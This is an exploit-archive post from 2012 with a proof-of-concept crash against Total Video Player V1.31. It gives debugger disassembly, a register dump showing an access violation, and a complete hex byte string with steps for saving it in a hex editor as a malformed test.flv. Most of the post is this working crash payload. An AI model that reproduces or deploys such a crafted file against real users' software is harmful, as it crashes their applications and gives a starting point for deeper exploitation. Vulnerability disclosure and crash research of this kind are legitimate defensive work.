Total Video Player V1.31 [.flv] vuln after exception handling



EKU-ID: 2286 CVE: OSVDB-ID:
Author: Ayrbyte Published: 2012-06-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*##############################################################################################
title       : Total Video Player V1.31 [.flv] vuln after exception handling
author      : Ayrbyte
link        : http://www.softpedia.com/get/Multimedia/Video/Video-Players/Total-Video-Player.shtml
tested on   : windows 7
fb          : fb.me/Ayrbyte
greetz to   : thank's to Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky,
              Zet Dot Exe and all b-compi family ^_^
              We are B-Compi... We are Hacker... We Are Proud...!
################################################################################################
aplication be crash after load 2 times test.flv
first loading test.flv then error message will appear "Cannot init video render"
after that tvp appear "The file can not be played" then when you load one again test.flv
program will be crash

[diasembly]
ntdll!KiRaiseUserExceptionDispatcher:
77016498 55               push    ebp
77016499 8bec             mov     ebp,esp
7701649b 83ec50           sub     esp,50h
7701649e 8944240c         mov     dword ptr [esp+0Ch],eax
770164a2 64a118000000     mov     eax,dword ptr fs:[00000018h]
770164a8 8b80a4010000     mov     eax,dword ptr [eax+1A4h]
770164ae 890424           mov     dword ptr [esp],eax
770164b1 c744240400000000 mov     dword ptr [esp+4],0
770164b9 c744240800000000 mov     dword ptr [esp+8],0
770164c1 c744241000000000 mov     dword ptr [esp+10h],0
770164c9 54               push    esp
770164ca e839000000       call    ntdll!RtlRaiseException (77016508)
770164cf 8b0424           mov     eax,dword ptr [esp]  ss:0023:0012c510=c0000008; <<--Access Violation
770164d2 8be5             mov     esp,ebp
770164d4 5d               pop     ebp
770164d5 c3               ret

[register]
eax=c0000008 ebx=00000000 ecx=0012c564 edx=77016498 esi=023408d0 edi=02340a40
eip=770164cf esp=0012c510 ebp=0012c560 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202

(ed8.548): Invalid handle - code c0000008 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll!KiRaiseUserExceptionDispatcher+0x37:
770164cf 8b0424          mov     eax,dword ptr [esp]  ss:0023:0012c510=c0000008 <<--
Access Violation. Unhandle exception in tvp.exe (NTDLL.DLL):0xC0000005:
################################################################################################

making file test.avi
open hex editor, put this hexa without "" to hex editor then save as test.flv

"46 4C 56 01 05 00 00 00 09 00 00 00 00 12 00 03 4B 00 00 00 00 00 00 00 02 00 0A 6F 6E 4D 65 74 61 44 61 74 61 08 00 00 00 0F 00 08 64 75 72 61 74 69 6F 6E 00 40 7E 02 39 58 10 62 4E 00 09 73 74 61 72 74 74 69 6D 65 00 00 00 00 00 00 00 00 00 00 0D 74 6F 74 61 6C 64 75 72 61 74 69 6F 6E 00 40 7E 02 39 58 10 62 4E 00 05 77 69 64 74 68 00 40 84 00 00 00 00 00 00 00 06 68 65 69 67 68 74 00 40 76 60 00 00 00 00 00 00 0D 76 69 64 65 6F 64 61 74 61 72 61 74 65 00 40 67 3F 38 C0 CF 6F BC 00 0D 61 75 64 69 6F 64 61 74 61 72 61 74 65 00 40 5B 3A 7B BE 49 D4 2B 00 0D 74 6F 74 61 6C 64 61 74 61 72 61 74 65 00 40 72 FA 4E 73 6C FF 90 00 09 66 72 61 6D 65 72 61 74 65 00 40 3D F7 E9 63 92 14 FC 00 0A 62 79 74 65 6C 65 6E 67 74 68 00 41 71 61 57 40 00 00 00 00 0D 63 61 6E 73 65 65 6B 6F 6E 74 69 6D 65 01 01 00 0A 73 6F 75 72 63 65 64 61 74 61 02 00 20 42 37 36 36 32 32 34 30 37 48 48 31 33 31 31 37 36 36 30 32 37 33 36 39 36 39 38 00 00 00 00 00 00 04 70 75 72 6C 02 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 70 6D 73 67 02 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0E 68 74 74 70 68 6F 73 74 68 65 61 64 65 72 02 01 00 6F 2D 6F 2E 70 72 65 66 65 72 72 65 64 2E 70 74 74 65 6C 6B 6F 6D 2D 62 74 68 31 2E 76 36 2E 6C 73 63 61 63 68 65 36 2E 63 2E 79 6F 75 74 75 62 65 2E 63 6F 6D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 00 03 56 09 00 00 2B 00 00 00 00 00 00 00 17 00 00 00 00 01 4D 40 1E FF E1 00 17 67 4D 40 1E 92 42 01 40 5F F3 42 00 00 07 D0 00 01 D3 74 1E 2C 5C 90 01 00 04 68 EE 3C 80 00 00 00 36 08 00 00 04 00 00 00 00 00 00 00 AF 00 12 10 00 00 00 0F 09 00 7E 93 00 00 00 00 00 00 00 17 01 00 00 00 00 00 7E 8A 65 88 80 80 0F FF 99 73 7B 80 3F 97 AF F9 03 CF A8 00 5A 0E 2C 83 53 FF 00 00 00 00 00 00 00 20 00 5F 07 0D 39 7D 55 85 97 BA FA F1 AB B8 E8 16 D4 0A 00 00 00 96 EF 55 28 DC 54 E4 8D 6B A3 36 55 C4 B8 95 1C 7D C9 87 00 00 01 3B 09 00 00 2E 07 53 6A 00 00 00 00 27 01 00 00 00 00 00 00 25 41 9A 48 95 90 9F FA 58 04 12 3A E9 97 B4 5B C3 33 EE FC 0E 7C 6D FC 1D 14 08 25 9C 3D 97 50 00 00 08 57 3F 64 00 00 00 39 09 00 00 30 07 53 8B 00 00 00 00 27 01 00 00 00 00 00 00 27 41 9A 4C 9D 90 9F FA 58 04 12 3C 3A AA 66 CC 20 95 2E FA B2 7D 17 7B DB 94 1D 75 55 3D 97 50 00 00 08 5A 98 6B E3 79 00 00 00 3B 09 00 00 05 07 53 8B 00 00 00 00 17 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10"

comment : untuk yang lihat ini, sory yo manual dulu soalnya kompilerku lagi cacad ^_^
##############################################################################################*/